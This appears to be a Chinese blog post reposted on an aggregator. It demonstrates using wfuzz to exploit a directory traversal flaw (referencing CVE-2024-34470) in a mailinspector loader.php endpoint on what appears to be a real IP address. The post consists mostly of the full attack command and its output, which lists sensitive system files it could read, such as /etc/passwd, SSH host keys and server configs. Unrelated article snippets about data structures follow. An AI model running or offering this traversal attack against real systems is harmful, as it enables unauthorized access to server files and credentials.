首页 > 其他分享 >「一个wfuzz应用案例」拿到目录遍历漏洞后用wfuzz爆破

「一个wfuzz应用案例」拿到目录遍历漏洞后用wfuzz爆破

时间:2024-06-15 12:43:08浏览次数:19  
标签:后用 200 Ch .. pub etc 遍历 wfuzz ssh 

┌──(root㉿kali)-[~]
└─# wfuzz -u http://XXX.XXX.XXX.XXX/mailinspector/public/loader.php?path=../../../../../../..FUZZ -w ~/weapons/http-payloads/linux_dir.txt --hl 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://187.63.160.15/mailinspector/public/loader.php?path=../../../../../../..FUZZ
Total requests: 201

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                         
=====================================================================

000000031:   200        1 L      2 W        28 Ch       "/etc/ld.so.conf"                                                               
000000017:   200        9 L      54 W       687 Ch      "/etc/fstab"                                                                    
000000016:   200        13 L     53 W       404 Ch      "/etc/crontab"                                                                  
000000029:   200        131 L    446 W      3523 Ch     "/etc/init.d/httpd"                                                             
000000030:   200        476 L    1763 W     14066 Ch    "/etc/init.d/mysql"                                                             
000000038:   200        36 L     48 W       1645 Ch     "/etc/passwd"                                                                   
000000053:   200        2 L      4 W        48 Ch       "/etc/resolv.conf"                                                              
000000057:   200        52 L     262 W      1836 Ch     "/etc/ssh/ssh_config"                                                           
000000058:   200        52 L     262 W      1836 Ch     "/etc/ssh/ssh_config"                                                           
000000020:   200        24 L     88 W       560 Ch      "/etc/httpd/conf.d/php.conf"                                                    
000000072:   200        3 L      3 W        67 Ch       "/etc/sysconfig/network"                                                        
000000071:   200        3 L      3 W        67 Ch       "/etc/sysconfig/network"                                                        
000000069:   200        1 L      2 W        382 Ch      "/etc/ssh/ssh_host_rsa_key.pub"                                                 
000000066:   200        1 L      3 W        627 Ch      "/etc/ssh/ssh_host_key.pub"                                                     
000000070:   200        1 L      2 W        382 Ch      "/etc/ssh/ssh_host_rsa_key.pub"                                                 
000000065:   200        1 L      3 W        627 Ch      "/etc/ssh/ssh_host_key.pub"                                                     
000000062:   200        1 L      2 W        590 Ch      "/etc/ssh/ssh_host_dsa_key.pub"                                                 
000000039:   200        182 L    491 W      4608 Ch     "/etc/php.ini"                                                                  
000000061:   200        1 L      2 W        590 Ch      "/etc/ssh/ssh_host_dsa_key.pub"                                                 
000000021:   200        991 L    4834 W     33726 Ch    "/etc/httpd/conf/httpd.conf"                                                    
000000143:   200        8 L      6 W        306 Ch      "/usr/local/Zend/etc/php.ini"                                                   

Total time: 0
Processed Requests: 201
Filtered Requests: 180
Requests/sec.: 0

参考CVE-2024-34470

标签:后用,200,Ch,..,pub,etc,遍历,wfuzz,ssh
From: https://www.cnblogs.com/sesmof/p/18249194

相关文章

  • 6.14-二叉树遍历
    题目分类题目分类大纲如下:二叉树的种类在我们解题过程中二叉树有两种主要的形式:满二叉树和完全二叉树。满二叉树满二叉树:如果一棵二叉树只有度为0的结点和度为2的结点,并且度为0的结点在同一层上,则这棵二叉树为满二叉树。如图所示:这棵二叉树为满二叉树,也可以说深度为k,有......
  • MySQL 游标遍历每一行数据做处理。
     delimiter$$--分隔标记CREATEPROCEDUREprocess_test()begin--声明变量declareSuoshuQY_pvarchar(255);declaredoneint;declarecurcursorforSELECTSuoshuQYasSuoshuQY_pFROMdiy_cabinet_listWHEREIsDeleted=0;declareco......
  • LeetCode刷题之HOT100之二叉树的遍历
    2024/6/14这几天总是下雨,天气预报上面显示这个月都要持续下雨,下雨天了怎么办?我好想你,不敢打给你,我找不到原因。说着说着唱起来了哈哈!Anyway,昨天晚上打开了《涅朵奇卡一个女人的一生》,这本篇幅不长的小说我很久前就想看,还是从王小波那里知道的这本书,才开始看陀思妥耶夫斯基,......
  • 单向链表————遍历、查找、插入结点 (基于C语言实现)
    #include<stdio.h>#include<stdbool.h>#include<stdlib.h>#include<stdbool.h>//指的是单向链表中的结点有效数据类型,用户可以根据需要进行修改typedefintDataType_t;//构造链表的结点,链表中所有结点的数据类型应该是相同的typedefstructLinkedList{Dat......
  • 【Java】 探索Java中遍历文件夹的奥秘:获取文件夹内所有文件名
    >>【痕迹】QQ+微信朋友圈和聊天记录分析工具>>(1)纯Python语言实现,使用Flask后端,本地分析,不上传个人数据。>>(2)内含QQ、微信聊天记录保存到本地的方法,真正实现自己数据自己管理。>>(3)数据可视化分析QQ、微信聊天记录,提取某一天的聊天记录与大模型对话。>>下载地......
  • BFS(广度优先搜索)优化技巧 — 双向遍历
    BFS优化技巧—双向遍历在之前我发过动态规划框架与动态规划的优化技巧—空间压缩,类似的,BFS框架也有相应的优化技巧双向遍历。从技巧的名字就可以看出,双向遍历指的就是从起点开始找终点的同时,也从终点开始找起点,一旦两个寻找过程出现交集,那么起点到终点的路径也就找出......
  • Future集合会等线程池执行完才开始遍历吗?
    先说结论:Future集合并不是等线程池执行完才开始遍历,而是线程池内的线程执行完一条Future集合就立即遍历一条在使用线程池的业务场景下,我们经常需要获取线程执行的返回值,此时我们需要Callable对象当做线程池参数并用List<Future>接收,然后遍历List<Future>获取我们想要的值。但是......
  • 力扣刷题记录: 1424. 对角线遍历Ⅱ
        本题是第182场周赛的Q3,LC竞赛分为1780。方法一.利用反对角线性质    在同一条反对角线上的元素的i+j值是相同的,同时,根据遍历的方式可知,i值越大的元素在同一条反对角线之中越先被遍历,i+j值越小的反对角线越早被遍历。考虑采用有序的map对i+j......
  • 使用foreach和stream遍历并修改List列表
    使用foreach和stream遍历并修改List列表1.使用foreachimportjava.util.ArrayList;importjava.util.HashMap;importjava.util.List;importjava.util.Map;importjava.util.stream.Collectors;publicclassTestList{publicstaticvoidmain(String[]args......
  • 程序猿大战Python——容器——字符串的遍历与常用的操作方法
    字符串的遍历使用for遍历字符串==目标:==掌握使用for语句遍历字符串。先来看看,for循环语法:for临时变量in序列: 满足条件时,执行的代码1 满足条件时,执行的代码2 ……[else:当for循环正常执行结束后,执行代码]例如,一起来完成:(1)定义一个字符串变量,内......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99